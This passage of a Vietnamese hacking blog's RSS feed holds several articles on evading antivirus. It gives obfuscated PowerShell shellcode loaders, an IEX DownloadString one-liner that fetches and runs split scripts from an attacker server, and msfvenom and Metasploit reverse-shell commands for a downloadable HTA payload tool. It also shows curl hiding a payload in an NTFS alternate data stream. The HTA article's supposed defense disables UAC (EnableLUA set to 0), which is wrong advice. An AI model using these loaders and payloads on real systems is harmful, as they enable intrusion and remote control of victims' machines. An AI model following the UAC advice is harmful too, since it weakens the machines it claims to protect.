Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $GVUAdTXmnEpoFzPorhRfka,[Parameter(Position = 1)] [Type] $RRqnOWxmsxKutFBpzSBCMlckCOfBNELkuuJsUOnHsB = [Void])
$YPjndxTHFIcbnisDBdfZAiWWMORMQEMwWeH = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType','Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
$YPjndxTHFIcbnisDBdfZAiWWMORMQEMwWeH.DefineConstructor('RTSpecialName, HideBySig, Public',[System.Reflection.CallingConventions]::Standard, $GVUAdTXmnEpoFzPorhRfka).SetImplementationFlags('Runtime, Managed')
$YPjndxTHFIcbnisDBdfZAiWWMORMQEMwWeH.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $RRqnOWxmsxKutFBpzSBCMlckCOfBNELkuuJsUOnHsB, $GVUAdTXmnEpoFzPorhRfka).SetImplementationFlags('Runtime, Managed')
return $YPjndxTHFIcbnisDBdfZAiWWMORMQEMwWeH.CreateType()
}</pre>
<p>&nbsp;</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">#sc4.ps1
$WCUBLvVuyTuTmQBWbcWjbjzYViRFjOXfFH = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((iRsUmgOEtIChVLeYYQcNrgKkLwHyChhaXKTDqfFcEs kernel32.dll VirtualAlloc),(DdKSsQGFmFfVhpHEtVzHaZFCWQGs @([IntPtr], [UInt32], [UInt32], [UInt32])([IntPtr]))).Invoke([IntPtr]::Zero, $LthwJuMUAmqvMRjAPliXdGwmLaXmjcSvILeKSAWVe.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($LthwJuMUAmqvMRjAPliXdGwmLaXmjcSvILeKSAWVe, 0, $WCUBLvVuyTuTmQBWbcWjbjzYViRFjOXfFH, $LthwJuMUAmqvMRjAPliXdGwmLaXmjcSvILeKSAWVe.Length)
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((iRsUmgOEtIChVLeYYQcNrgKkLwHyChhaXKTDqfFcEs kernel32.dll CreateThread),(DdKSsQGFmFfVhpHEtVzHaZFCWQGs @([IntPtr], [UInt32], [IntPtr], [IntPtr],[UInt32], [IntPtr])([IntPtr]))).Invoke([IntPtr]::Zero,0,$WCUBLvVuyTuTmQBWbcWjbjzYViRFjOXfFH,[IntPtr]::Zero,0,[IntPtr]::Zero)</pre>
<p>Các bước để thực hiện kĩ thuật Splitfus này cũng rất đơn giản. Đầu tiên, mình sử dụng lệnh sau để khởi tạo server Python trên cổng 80 với địa chỉ IP là 192.168.1.17:</p>
<p><code>python3 -m http.server 80</code></p>
<p>Server này sẽ lưu các file script PowerShell đã tách nhỏ và làm rối, cho phép máy nạn nhân tải xuống từng phần riêng biệt.</p>
<p>Cuối cùng mình tạo 1 đoạn lệnh thực thi ngắn gọn để thực thi trên máy nạn nhân</p>
<p><code>1..4 | ForEach-Object { IEX (New-Object System.Net.WebClient).DownloadString("http://192.168.1.17/sc$_.ps1") }</code></p>
<p>Lệnh này sẽ tải xuống và thực thi từng file script từ sc1.ps1 đến sc4.ps1. Đây là cách hiệu quả để vượt qua các cơ chế phát hiện mã độc vì mỗi phần riêng lẻ có thể trông vô hại. Khi kết hợp lại, chúng tạo thành một cuộc tấn công hoàn chỉnh mà nhiều giải pháp bảo mật không thể phát hiện</p>
<p><img decoding="async" src="https://anonyviet.com/wp-content/uploads/2025/07/word-image-91200-4.gif" alt="Cách hacker sử dụng kĩ thuật Splitfus để thực thi mã độc Powershell 2" title="Cách hacker sử dụng kĩ thuật Splitfus để thực thi mã độc Powershell 13"></p>
<p>Với Metasploit, việc tạo shellcode trở nên dễ dàng hơn rất nhiều. Mình sẽ sử dụng lệnh msfvenom để tạo ra shellcode mới, sau đó thay thế vào script sc1.ps1. Điều này cho phép mình tùy biến cuộc tấn công theo nhiều hướng khác nhau, từ lấy quyền điều khiển máy tính nạn nhân đến đánh cắp thông tin hoặc cài đặt backdoor</p>
<p><a href="https://streamable.com/rwoo4k" rel="noopener">https://streamable.com/rwoo4k</a></p>
<p>Và đó là những ví dụ đơn giản, nhưng thực tế, mã độc PowerShell không hề đơn giản như vậy. Các hacker sẽ phải dùng thêm kĩ thuật <a href="https://anonyviet.com/bypass-amsi-va-thuc-thi-ma-doc-tren-windows/">Bypass AMSI</a> để tăng tỉ lệ thành công</p>
<h2><strong>Cách phòng thủ trước kỹ thuật Splitfus</strong></h2>
<p>Kỹ thuật Splitfus là một trong những phương pháp tấn công bằng PowerShell tinh vi, khó phát hiện nếu hệ thống không được giám sát chặt chẽ. Để phòng thủ hiệu quả trước Splitfus, đội ngũ an ninh mạng cần triển khai đồng bộ nhiều biện pháp chủ động, từ việc giám sát hành vi cho đến xây dựng hệ thống cảnh báo sớm và đào tạo người dùng cuối.</p>
<h3><strong> Tăng cường giám sát PowerShell</strong></h3>
<p>PowerShell là công cụ thường bị lạm dụng trong các cuộc tấn công hiện đại. Để theo dõi hoạt động bất thường, hệ thống cần bật tính năng ghi nhật ký Script Block Logging (sử dụng Event ID 4104) kết hợp với Module Logging. Những thiết lập này giúp lưu lại toàn bộ lệnh PowerShell đã được thực thi, kể cả khi đã bị làm rối mã (obfuscate). Ngoài ra, nên kích hoạt chế độ Constrained Language Mode để hạn chế việc sử dụng các lệnh nguy hiểm trong môi trường thực thi PowerShell.</p>
<h3><strong>Kích hoạt và bảo vệ AMSI (Antimalware Scan Interface)</strong></h3>
<p>AMSI là lớp phòng vệ quan trọng giúp phân tích mã trước khi được thực thi trong PowerShell. Việc đảm bảo AMSI luôn được bật và không bị vượt qua (bypass) là điều thiết yếu. Khi tích hợp cùng Microsoft Defender hoặc các giải pháp EDR có hỗ trợ quét AMSI, khả năng phát hiện mã độc bị làm rối sẽ được nâng cao rõ rệt, giúp ngăn chặn sớm các hành vi tấn công từ Splitfus.</p>
<h3><strong>Kiểm tra hành vi tải động trong hệ thống</strong></h3>
<p>Một đặc điểm thường thấy của Splitfus là sử dụng các tham số nguy hiểm trong PowerShell như EncodedCommand hoặc gọi hàm IEX để tải mã từ xa thông qua chuỗi như (New-Object Net.WebClient).DownloadString. Hệ thống EDR hoặc HIDS cần được cấu hình để nhận diện những hành vi này. Đồng thời, cần cảnh giác khi phát hiện script được tải về từ domain không đáng tin cậy, đặc biệt là các yêu cầu HTTP GET chứa tập tin đuôi .ps1.</p>
<h3><strong>Thiết lập kiểm soát truy cập mạng chặt chẽ</strong></h3>
<p>Kiểm soát truy cập mạng đóng vai trò quan trọng trong việc ngăn chặn Splitfus giao tiếp với máy chủ điều khiển (C2 server). Cần chủ động chặn các kết nối outbound đến địa chỉ IP hoặc domain nghi ngờ. Việc cấu hình proxy kết hợp với kiểm tra TLS (TLS inspection) sẽ giúp phát hiện các hành vi tải mã ẩn dưới kết nối được mã hóa. Bên cạnh đó, cập nhật liên tục các chỉ số tấn công (IOC) từ nguồn Threat Intelligence Feed sẽ nâng cao khả năng nhận diện và phản ứng kịp thời.</p>
<p>Cuối cùng, yếu tố con người luôn là mắt xích yếu nhất trong chuỗi phòng thủ. Việc tuyên truyền và đào tạo người dùng cuối nhằm nâng cao nhận thức bảo mật là điều bắt buộc. Nhân viên cần được hướng dẫn không chạy script từ các nguồn không rõ ràng. Đồng thời, kỹ năng nhận diện email giả mạo (phishing) cũng cần được chú trọng vì đây thường là điểm xuất phát của các cuộc tấn công Splitfus.</p>
<h2>Câu hỏi thường gặp</h2>
<h3>Splitfus là gì và tại sao nó hiệu quả trong việc vượt qua Antivirus?</h3>
<p>Splitfus là kỹ thuật hacker chia nhỏ mã độc PowerShell, làm rối code và thực thi từng phần.  Điều này giúp giảm khả năng bị phát hiện dựa trên chữ ký, tránh quét tĩnh và sandbox, đồng thời bypass AMSI (Antimalware Scan Interface).</p>
<h3>Kỹ thuật Splitfus hoạt động như thế nào trong thực tế?</h3>
<p>Hacker chia mã độc thành nhiều đoạn nhỏ, mã hóa chúng và tải từng đoạn lên máy nạn nhân để thực thi.  Việc này làm cho mã độc khó bị phát hiện hơn so với việc tải và thực thi một file mã độc lớn.</p>
<h3>Có những công cụ nào hỗ trợ thực hiện kỹ thuật Splitfus?</h3>
<p>Nhiều chiến dịch tấn công APT và framework malware như Cobalt Strike, PowerShell Empire, Metasploit sử dụng kỹ thuật tương tự Splitfus.  Ngoài ra, các công cụ như Chimera có thể giúp làm rối mã nguồn PowerShell, hỗ trợ việc sử dụng kỹ thuật này.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://anonyviet.com/cach-hacker-su-dung-ki-thuat-splitfus/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Htamal: kỹ thuật thực thi shellcode từ xa vượt qua phát hiện của Antivirus</title>
		<link>https://anonyviet.com/htamal-ky-thuat-thuc-thi-shellcode/</link>
					<comments>https://anonyviet.com/htamal-ky-thuat-thuc-thi-shellcode/#comments</comments>
		
		<dc:creator><![CDATA[Hevin]]></dc:creator>
		<pubDate>Mon, 10 Feb 2025 12:02:41 +0000</pubDate>
				<category><![CDATA[Basic Hacking]]></category>
		<category><![CDATA[hta]]></category>
		<category><![CDATA[mã độc]]></category>
		<category><![CDATA[payload]]></category>
		<guid isPermaLink="false">https://anonyviet.com/?p=80296</guid>

					<description><![CDATA[Việc thực thi mã độc mà không bị phát hiện bởi các phần mềm diệt virus (Antivirus) là một thách thức không nhỏ đối với cả bên tấn công lẫn phòng thủ. Hôm nay, chúng ta sẽ khám phá một công cụ mang tên HtaMal, một phương pháp sáng tạo cho phép thực thi shellcode [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>Việc thực thi mã độc mà không bị phát hiện bởi các phần mềm diệt virus (Antivirus) là một thách thức không nhỏ đối với cả bên tấn công lẫn phòng thủ. Hôm nay, chúng ta sẽ khám phá một công cụ mang tên <strong>HtaMal</strong>, một phương pháp sáng tạo cho phép thực thi <strong>shellcode từ xa</strong> trong môi trường Windows, đồng thời <strong>vượt qua các cơ chế phát hiện của Antivirus</strong> một cách hiệu quả. Kỹ thuật này lợi dụng <strong>HTA (HTML Application) và JavaScript</strong>, cho phép kẻ tấn công tải và thực thi shellcode trực tiếp từ xa, từ đó giảm thiểu khả năng bị phát hiện. Được rồi, không dài dòng nữa vào luôn vấn đề chính thôi !</p>
<p><strong><em>Lưu ý: Bài viết này chỉ dành cho mục đích nghiên cứu, học tập. Anonyviet sẽ không chịu bất cứ mọi hành vi bất hợp pháp nào !</em></strong></p>
<h2><strong>Khái niệm ngắn gọn về HTA và phương thức tấn công</strong></h2>
<h3><strong>HTA là gì?</strong></h3>
<p>HTA (HTML Application) là một loại ứng dụng dựa trên HTML do Microsoft phát triển, có thể thực thi trực tiếp thông qua <strong>mshta.exe</strong> mà không bị hạn chế bởi sandbox của trình duyệt. Chính vì thế HTA trở thành một công cụ hữu ích cho các tác vụ tự động hóa hợp pháp, nhưng cũng là một công cụ lợi hại trong tay hacker</p>
<h3><strong>Tại sao HTA có thể bị lạm dụng?</strong></h3>
<ul>
<li><strong>Chạy với quyền cao</strong>: HTA có thể thực thi <strong>VBScript/JavaScript</strong> với quyền của người dùng mà không cần hiển thị cửa sổ cảnh báo như khi chạy script thông thường</li>
<li><strong>Không cần ghi file</strong>: Hacker có thể tải HTA từ xa mà không cần lưu trữ nội dung độc hại trên máy nạn nhân</li>
<li><strong>Bỏ qua một số giải pháp bảo mật</strong>: Một số phần mềm Antivirus không quét HTA kỹ như các file thực thi khác (.exe, .dll), tạo ra cơ hội bypass</li>
</ul>
<h2><strong>Cách thức hoạt động của payload HtaMal</strong></h2>
<p>HtaMal là một công cụ tạo ra 1 payload <strong>HTA để thực thi shellcode từ xa</strong>, giúp tránh bị phát hiện bởi Antivirus. Quy trình tổng quát như sau:</p>
<p><strong>Tạo file HTA chứa mã JavaScript độc hại</strong></p>
<ul>
<li>Trong source code của tool mình đã xáo trộn payload ở trang <a href="https://obfuscator.io/" rel="noopener">https://obfuscator.io/</a>, bạn có thể xem các source code của payload ở phần cuối trong source tool</li>
<li>Payload của HtaMal sẽ chuyển tên file, url và lệnh thực thi sang hex và 2 tệp: <strong>autoit.exe và loader.a3x</strong> được mã hóa bằng thuật toán XOR. Khi payload thực thi trên máy nạn nhân, nó sẽ tự giải mã và thực thi lệnh trong thư mục %appdata%</li>
</ul>
<p><strong>Tải shellcode từ máy chủ C2: </strong>Khi người dùng mở file HTA, script <strong>loader.a3x</strong> sẽ lấy shellcode từ server của hacker</p>
<p><strong>Lợi dụng chữ ký số (Digital Signature) hợp lệ của file autoit.exe để bypass Antivirus</strong></p>
<ul>
<li>Mình đã compile script loader.au3 sang loader.a3x, khi chạy lệnh <strong>autoit.exe loader.a3x &lt;hex_url_shellcode&gt;</strong> thực hiện <strong>tải xuống và thực thi shellcode từ xa</strong>, bằng cách sử dụng các hàm <a href="https://learn.microsoft.com/en-us/windows/win32/apiindex/windows-api-list" rel="noopener">Windows API</a> để cấp phát bộ nhớ, sao chép shellcode vào vùng nhớ đã cấp phát, sau đó tạo một luồng mới để thực thi shellcode.</li>
<li>Một trong những kỹ thuật <strong>Bypass Antivirus (AV) </strong>phổ biến là <strong>lợi dụng chữ ký số hợp lệ của phần mềm hợp pháp</strong> để thực thi mã độc. Trong trường hợp này, mình đã <strong>lợi dụng AutoIt.exe có chữ ký số hợp lệ</strong> để tránh bị phát hiện bởi phần mềm bảo mật</li>
</ul>
<p><strong>HtaMal &#8211; Công cụ tạo payload thực thi Shellcode từ xa Bypass Antivirus</strong></p>
<p>Để sử dụng công cụ này, bạn cần phải tải Python về máy, sau đó tải source code của tool <a href="https://www.mediafire.com/file/8455ry5a5v2d24g/HtaMal.zip/file" rel="noopener">tại đây</a>, sau khi tải xong bạn giải nén ra và trải nghiệm thôi ( Pass giải nén: anonyviet.com )</p>
<p>Trước khi sử dụng HtaMal, chúng ta cần phải tạo ra một shellcode, ở đây mình sẽ sử dụng Metasploit để tạo với câu lệnh:</p>
<p><code>msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.1.33 lport=8443 -f raw -o shellcode.bin</code></p>
<p><code>#Setup môi trường lệnh tấn công</code></p>
<p><code>msfconsole</code></p>
<p><code>use exploit/multi/handler</code></p>
<p><code>set payload windows/x64/meterpreter/reverse_https</code></p>
<p><code>set lhost=your ip address</code></p>
<p><code>set lport=your port</code></p>
<p><code>run</code></p>
<p><img decoding="async" class="aligncenter size-full " src="https://anonyviet.com/wp-content/uploads/2025/02/word-image-80301-1.png" alt="Htamal: kỹ thuật thực thi shellcode từ xa vượt qua phát hiện của Antivirus 6" width="600" height="89" title="Htamal: kỹ thuật thực thi shellcode từ xa vượt qua phát hiện của Antivirus 18"></p>
<p>Tiếp đến, chạy lệnh python3 -m http.server 80 để mở ra server lưu trữ file <strong>shellcode.bin </strong>và python3 htamal.py để chạy tool. Bây giờ mình sẽ nhập url chứa shellcode của mình<br />
<img decoding="async" class="aligncenter size-full " src="https://anonyviet.com/wp-content/uploads/2025/02/word-image-80301-2.png" alt="Htamal: kỹ thuật thực thi shellcode từ xa vượt qua phát hiện của Antivirus 7" width="990" height="401" title="Htamal: kỹ thuật thực thi shellcode từ xa vượt qua phát hiện của Antivirus 19"></p>
<p>Như vậy đã xong, bây giờ mình sẽ nén payload <strong>hta_payload.hta</strong> thành file zip với mật khẩu là 123123@</p>
<p><img decoding="async" class="aligncenter size-full " src="https://anonyviet.com/wp-content/uploads/2025/02/word-image-80301-3.png" alt="Htamal: kỹ thuật thực thi shellcode từ xa vượt qua phát hiện của Antivirus 8" width="646" height="506" title="Htamal: kỹ thuật thực thi shellcode từ xa vượt qua phát hiện của Antivirus 20"></p>
<p>Và đây là kết quả:</p>
<p><img decoding="async" class="aligncenter size-full " src="https://anonyviet.com/wp-content/uploads/2025/02/a-screenshot-of-a-computer-ai-generated-content-m.png" alt="A screenshot of a computer AI-generated content may be incorrect." width="1598" height="923" title="Htamal: kỹ thuật thực thi shellcode từ xa vượt qua phát hiện của Antivirus 21"></p>
<p>Video demo:</p>
<p><iframe loading="lazy" class="wp-embedded-content" sandbox="allow-scripts" security="restricted" title="HtaMal" src="https://streamable.com/o/cd36kf#?secret=7yxcR1Anc4" data-secret="7yxcR1Anc4" frameborder="0" scrolling="no" width="1280" height="720"></iframe></p>
<h2><strong>Cách phòng chống tấn công bằng HTA</strong></h2>
<p>Do mshta.exe hiếm khi cần thiết trong môi trường doanh nghiệp, chặn mshta.exe là một cách đơn giản để giảm nguy cơ bị tấn công. Có thể thực hiện bằng cách:</p>
<p><code>Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\System" -Name "EnableLUA" -Value 0</code></p>
<p>Hoặc trong Group Policy:</p>
<ul>
<li><strong>Computer Configuration → Windows Settings → Security Settings → Software Restriction Policies</strong></li>
<li>Thêm <strong>mshta.exe</strong> vào danh sách bị chặn</li>
</ul>
<p>HtaMal là một công giúp tạo payload thực thi shellcode từ xa, sử dụng các kỹ thuật <strong>bypass Antivirus (AV) </strong>để tránh bị phát hiện. Bằng cách kết hợp <strong>HTA (HTML Application)</strong> với <strong>AutoIt</strong>, công cụ này có thể thực thi mã độc trực tiếp trong bộ nhớ. Tuy nhiên, điều quan trọng cần nhấn mạnh là <strong>HtaMal chỉ được sử dụng cho mục đích nghiên cứu bảo mật và kiểm thử xâm nhập hợp pháp</strong>.</p>
<p>Để phòng chống các kỹ thuật bypass AV như HtaMal, cần phải:<br />
🔹 Giám sát tiến trình đáng ngờ, đặc biệt là AutoIt.exe.<br />
🔹 Hạn chế thực thi HTA trên hệ thống nếu không cần thiết.<br />
🔹 Áp dụng các cơ chế bảo vệ nâng cao như Application Whitelisting, AMSI Logging, và Behavioral Analysis.</p>
<p>👉 <strong>Bạn nghĩ gì về phương pháp này? Có cách nào cải thiện khả năng phát hiện của AV để chống lại kỹ thuật này không? Hãy chia sẻ ý kiến của bạn! 🚀</strong></p>
<h2>Câu hỏi thường gặp</h2>
<h3>HTA (HTML Application) là gì và tại sao nó lại dễ bị lợi dụng trong tấn công?</h3>
<p>HTA là ứng dụng dựa trên HTML, có thể chạy trực tiếp bằng mshta.exe mà không bị hạn chế bởi sandbox trình duyệt. Điều này cho phép nó thực thi VBScript/JavaScript với quyền người dùng, tải mã độc từ xa mà không cần lưu file, và bỏ qua một số cơ chế bảo mật của Antivirus.</p>
<h3>HtaMal hoạt động như thế nào để thực thi shellcode từ xa và vượt qua Antivirus?</h3>
<p>HtaMal tạo payload HTA chứa mã JavaScript, tải shellcode từ máy chủ C2, và lợi dụng AutoIt.exe (có chữ ký số hợp lệ) để giải mã và thực thi shellcode trong bộ nhớ, qua đó tránh bị phát hiện.</p>
<h3>Làm thế nào để phòng chống các cuộc tấn công sử dụng kỹ thuật tương tự như HtaMal?</h3>
<p>Chặn mshta.exe, giám sát tiến trình đáng ngờ (như AutoIt.exe), hạn chế thực thi HTA, và áp dụng các cơ chế bảo vệ nâng cao như Application Whitelisting, AMSI Logging, và Behavioral Analysis.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://anonyviet.com/htamal-ky-thuat-thuc-thi-shellcode/feed/</wfw:commentRss>
			<slash:comments>2</slash:comments>
		
		
			</item>
		<item>
		<title>Lỗ hổng WinRAR tự thực thi mã độc khi mở file nén</title>
		<link>https://anonyviet.com/lo-hong-winrar-tu-thuc-thi-ma-doc-khi-mo-file-nen/</link>
					<comments>https://anonyviet.com/lo-hong-winrar-tu-thuc-thi-ma-doc-khi-mo-file-nen/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Sat, 19 Aug 2023 05:13:49 +0000</pubDate>
				<category><![CDATA[Tin tức]]></category>
		<category><![CDATA[cve]]></category>
		<category><![CDATA[CVE-2023-40477]]></category>
		<category><![CDATA[mã độc]]></category>
		<category><![CDATA[nén]]></category>
		<category><![CDATA[winrar]]></category>
		<guid isPermaLink="false">https://anonyviet.com/?p=50134</guid>

					<description><![CDATA[Một lỗ hổng nghiêm trọng trong WinRAR &#8211; phần mềm nén file phổ biện nhất hiện nay dành cho Windows được hàng triệu người sử dụng, có thể thực thi các lệnh trên máy tính chỉ bằng cách mở file nén .rar. Gần đây, một lỗ hổng bảo mật mới đã được tìm thấytrong WinRAR, [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><strong>Một lỗ hổng nghiêm trọng trong WinRAR &#8211; phần mềm nén file phổ biện nhất hiện nay dành cho Windows được hàng triệu người sử dụng, có thể thực thi các lệnh trên máy tính chỉ bằng cách mở file nén .rar.</strong></p>
<p>Gần đây, một lỗ hổng bảo mật mới đã được tìm thấytrong WinRAR, có mã CVE-2023-40477, điểm CVSS là 7,8. Lỗ hổng này giúp Hacker tấn công từ xa thực thi mã lệnh tùy ý trên các máy tính có cài đặt WinRAR. Mã độc được đính kèm vào file nén có thể giành quyền kiểm soát máy tính nếu người dùng mở file nén từ winrar.</p>
<p>Nguyên nhân của vấn đề bắt nguồn từ việc thiếu xác thực dữ liệu do người dùng cung cấp. Việc xác thực lỏng lẻo này có thể dẫn đến một tình huống trong đó quyền truy cập bộ nhớ vượt quá bộ đệm đã được phân bổ cho khi nén file, tạo ra môi trường thuận lợi cho Hacker đính kèm mã độc vào file nén.</p>
<p>WinRAR đã nhanh chóng vá lỗ hổng nguy hiểm này ngay sau đó. Trong phiên bản mới nhất, WinRAR 6.23, lỗ hổng CVE-2023-40477 đã được vá thành công Người dùng cần nhanh chóng cập nhật lên phiên bản mới nhất để tránh trường hợp Hacker phát tán Virus qua file nén.</p>
<p>Để kiểm tra phiên bản Winrar đang sử dụng, bạn mở Winrar lên chọn <strong>Menu Help -&gt; About</strong></p>
<p><img decoding="async" class="aligncenter size-full " src="https://anonyviet.com/wp-content/uploads/2023/08/lo-hong-bao-mat-winrar-CVE-2023-40477.png" alt="lo hong bao mat winrar CVE-2023-40477" width="705" height="377" title="Lỗ hổng WinRAR tự thực thi mã độc khi mở file nén 24"></p>
<p>Kiểm tra phiên bản Winrar nếu thấp hơn 6.23 thì cần cập nhật lên bản cao nhất.</p>
<p><img decoding="async" class="aligncenter size-full " src="https://anonyviet.com/wp-content/uploads/2023/08/lo-hong-winrar.png" alt="Lỗ hổng WinRAR tự thực thi mã độc khi mở file nén 10" width="532" height="275" title="Lỗ hổng WinRAR tự thực thi mã độc khi mở file nén 25"></p>
<p>Để cập nhật Winrar, bạn tải phần mềm từ trang Web chính chủ <a href="https://www.rarlab.com/download.htm" rel="noopener">rarlab.com</a> để cài đăt.</p>
<p>Nếu muốn <strong>kích hoạt bản quyền vĩnh viển</strong>, có thể dùng Key trong <a href="https://anonyviet.com/phan-mem-giai-nen-winrar-ban-quyen/">bài viết này</a>.</p>
<p>Nếu bạn không tin tưởng Winrar, có thể dùng phần mềm 7-Zip hoặc chờ Windows 11 nâng cấp tính năng nén và giải nén RAR, 7-Zip và GZ trong phiên bản cập nhật sắp tới.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://anonyviet.com/lo-hong-winrar-tu-thuc-thi-ma-doc-khi-mo-file-nen/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Hacker ẩn Malware vào hình ảnh và thực thi như thế nào ?</title>
		<link>https://anonyviet.com/hacker-an-malware-vao-hinh-anh-va-thuc-thi-nhu-the-nao/</link>
					<comments>https://anonyviet.com/hacker-an-malware-vao-hinh-anh-va-thuc-thi-nhu-the-nao/#respond</comments>
		
		<dc:creator><![CDATA[Hevin]]></dc:creator>
		<pubDate>Sat, 05 Aug 2023 11:36:26 +0000</pubDate>
				<category><![CDATA[Basic Hacking]]></category>
		<category><![CDATA[ẩn virus vào hình ảnh]]></category>
		<category><![CDATA[mã độc]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[virus]]></category>
		<guid isPermaLink="false">https://anonyviet.com/?p=49771</guid>

					<description><![CDATA[Thế giới kỹ thuật số ngày càng phát triển mạnh mẽ, nguy cơ từ các hacker và Virus luôn là mối quan tâm hàng đầu của người dùng Internet. Các tấn công mạng ngày càng tinh vi và phức tạp, và một trong những phương pháp đáng sợ nhất mà hacker đang sử dụng là [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>Thế giới kỹ thuật số ngày càng phát triển mạnh mẽ, nguy cơ từ các hacker và Virus luôn là mối quan tâm hàng đầu của người dùng Internet. Các tấn công mạng ngày càng tinh vi và phức tạp, và một trong những phương pháp đáng sợ nhất mà hacker đang sử dụng là thực thi mã độc thông qua hình ảnh. Có thể bạn đã nghe nói về việc đính kèm mã độc vào tệp tin hình ảnh và lây lan thông qua các trang web, email hay ứng dụng đúng không nhỉ ? Vậy trong bài viết này, Anonyviet demo lại cách mà hacker thực thi Virus (phần mềm độc hại) bằng hình ảnh và tại sao phương pháp này có thể gây hậu quả nghiêm trọng cho việc bảo mật thông tin của chúng ta. Được rồi, vào vấn đề chính thôi !</p>
<p><strong><span style="color: #ff0000;">Lưu ý: Bài viết chỉ dành cho mục đích giáo dục, nghiên cứu và học tập. Mọi hành vi liên quan đến pháp luật, Anonyviet sẽ không chịu trách nhiệm về mọi hành vi mà bạn gây ra ! </span></strong></p>
<h2><span style="color: #0000ff; font-size: 14pt;"><strong>Demo Hacker ẩn Virus vào hình ảnh và cách thực thi</strong></span></h2>
<p>Đầu tiên mình đã chuẩn bị sẵn một hình ảnh có tên là anonyviet.jpg, và một máy chủ Kali Linux để lưu trữ các mã độc. Bây giờ mình sử dụng lệnh <a href="https://anonyviet.com/?s=curl">curl</a> để lấy để lấy &#8220;mã độc&#8221; có trong payload.txt. Trong payload.txt mình đã lưu trữ một dòng lệnh <code>calc.exe</code> .Đây là một câu lệnh đơn giản để mở Calculator trên hệ điều hành Windows.</p>
<figure id="attachment_49772" aria-describedby="caption-attachment-49772" style="width: 708px" class="wp-caption aligncenter"><img decoding="async" class=" size-full" src="https://anonyviet.com/wp-content/uploads/2023/08/a.png" alt="Ẩn Virus vào hình ảnh" width="708" height="328" title="Hacker ẩn Malware vào hình ảnh và thực thi như thế nào ? 30"><figcaption id="caption-attachment-49772" class="wp-caption-text">hide Virus</figcaption></figure>
<p>Để nhúng calc.exe vào hình ảnh anonyviet.jpg mình đã thực hiện lệnh sau:</p>
<p><code>curl http://192.168.0.111:8000/payload.txt &gt; anonyviet.jpg:payload</code></p>
<p>Câu lệnh trên sẽ thực hiện việc tải về nội dung từ URL &#8220;http://192.168.0.111:8000/payload.txt&#8221; và ghi nội dung đó vào tệp tin &#8220;anonyviet.jpg:payload&#8221;</p>
<p>Sau lệnh curl thực thi xong, chúng ta có thể thấy dung lượng hình ảnh không thay đổi nhưng khi bạn nhập lệnh <code>dir /r</code>thì các bạn có thể thấy 1 dữ liệu khác có tên là <code>anonyviet.jpg:payload:$DATA</code></p>
<figure id="attachment_49773" aria-describedby="caption-attachment-49773" style="width: 913px" class="wp-caption aligncenter"><img decoding="async" class=" size-full" src="https://anonyviet.com/wp-content/uploads/2023/08/b.png" alt="Ẩn Virus vào hình ảnh" width="913" height="393" title="Hacker ẩn Malware vào hình ảnh và thực thi như thế nào ? 31"><figcaption id="caption-attachment-49773" class="wp-caption-text">Ẩn Virus vào hình ảnh</figcaption></figure>
<p>Mặc dù các bạn đã biết trong <code>anonyviet.jpg:payload:$DATA</code>có chứa dữ liệu &#8220;calc.exe&#8221;, nhưng trong trường hợp khác. Giả sử nếu bạn thực thi 1 file virus.exe, con virus này nó thực thi câu lệnh curl giống như trên. Vậy làm sao để biết được mã độc dấu trong hình ảnh. Và đây là cách mình kiểm tra với lệnh bên dưới:</p>
<p><code>powershell -c "Get-Content .\anonyviet.jpg -Stream payload"</code></p>
<p>Câu lệnh trên được sử dụng để truy xuất dữ liệu từ một luồng dữ liệu (stream) đặc biệt trong tệp tin &#8220;anonyviet.jpg&#8221;. Để hiểu rõ hơn về lệnh này, mình sẽ giải thích từng phần cụ thể:</p>
<ol>
<li><code>powershell</code>: Đây là một chương trình dòng lệnh trong hệ điều hành Windows, cho phép thực thi các lệnh và tập lệnh (script) PowerShell.</li>
<li><code>-c</code>: Đây là tùy chọn &#8220;command&#8221; trong PowerShell, cho phép bạn cung cấp một câu lệnh PowerShell trực tiếp từ dòng lệnh.</li>
<li><code>"Get-Content .\anonyviet.jpg -Stream payload"</code>: Đây là câu lệnh PowerShell được trích dẫn trong dấu ngoặc kép. Nó sẽ được thực thi bởi PowerShell khi bạn chạy câu lệnh đó.
<ul>
<li><code>Get-Content</code>: Là một cmdlet (lệnh) trong PowerShell được sử dụng để đọc nội dung của tệp tin.</li>
<li><code>.\anonyviet.jpg</code>: Là đường dẫn tới tệp tin &#8220;anonyviet.jpg&#8221; trong thư mục hiện tại</li>
<li><code>-Stream payload</code>: Đây là tham số &#8220;payload&#8221; của lệnh Get-Content. Trong PowerShell, &#8220;-Stream&#8221; cho phép bạn đọc dữ liệu từ các luồng dữ liệu đặc biệt của tệp tin. Trong trường hợp này, mình đang truy xuất dữ liệu từ luồng &#8220;payload&#8221; trong tệp tin &#8220;anonyviet.jpg&#8221;</li>
</ul>
</li>
</ol>
